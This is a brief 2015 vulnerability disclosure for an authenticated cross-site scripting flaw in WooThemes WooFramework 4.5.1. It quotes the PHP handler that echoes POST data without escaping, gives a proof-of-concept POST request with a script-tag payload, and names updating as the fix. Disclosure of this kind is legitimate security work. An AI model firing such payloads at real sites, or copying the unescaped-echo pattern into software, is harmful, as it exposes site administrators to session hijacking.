WooThemes WooFramework 4.5.1 Cross Site Scripting
Posted on 25 April 2015
------------------------------------------------------------------------------ WooThemes WooFramework 4.5.1 Authenicated Cross Site Scripting (XSS) ------------------------------------------------------------------------------ [-] Vulnerability Description: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) the vulnerability is in function "woo_sbm_callback": Vuln Code: function woo_sbm_callback() { ... $save_type = $_POST['type']; ... if($save_type == 'woo_sbm_get_links'){ $data = $_POST['data']; parse_str($data,$data_array); $type = $data_array['type']; $slug = $data_array['slug']; $name = $data_array['name']; $id = $data_array['id']; ... ... echo "$type|$name|$slug|$id|$url|$conditional"; } ... } add_action( 'wp_ajax_woo_sbm_post_action', 'woo_sbm_callback' ); [-] Proof Of Concept: URL: http://localhost/x/wordpress/wp-admin/admin-ajax.php?action=woo_sbm_post_action Post Data: type=woo_sbm_get_links&data=type=<script>alert(1)</script> [-] Fix / Solution: Update to latest framework.
